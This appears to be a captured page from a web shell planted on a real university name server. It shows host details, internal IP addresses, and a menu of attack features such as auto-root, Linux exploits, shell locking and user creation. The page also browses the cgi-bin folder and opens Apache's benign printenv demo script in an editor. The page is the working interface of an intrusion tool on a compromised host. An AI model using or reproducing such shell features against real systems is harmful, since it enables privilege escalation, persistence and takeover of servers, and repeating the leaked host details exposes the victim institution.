Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
cgi-bin /
[ HOME SHELL ]
Name
Size
Permission
Action
printenv
820
B
-rw-r--r--
printenv.vbs
1.05
KB
-rw-r--r--
printenv.wsf
1.11
KB
-rw-r--r--
test-cgi
1.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : printenv
# # To permit this cgi, replace # on the first line above with the # appropriate #!/path/to/perl shebang, and on Unix / Linux also # set this script executable with chmod 755. # # ***** !!! WARNING !!! ***** # This script echoes the server environment variables and therefore # leaks information - so NEVER use it in a live server environment! # It is provided only for testing purpose. # Also note that it is subject to cross site scripting attacks on # MS IE and any other browser which fails to honor RFC2616. ## ## printenv -- demo CGI program which just prints its environment ## use strict; use warnings; print "Content-type: text/plain; charset=iso-8859-1\n\n"; foreach my $var (sort(keys(%ENV))) { my $val = $ENV{$var}; $val =~ s|\n|\\n|g; $val =~ s|"|\\"|g; print "${var}=\"${val}\"\n"; }
Close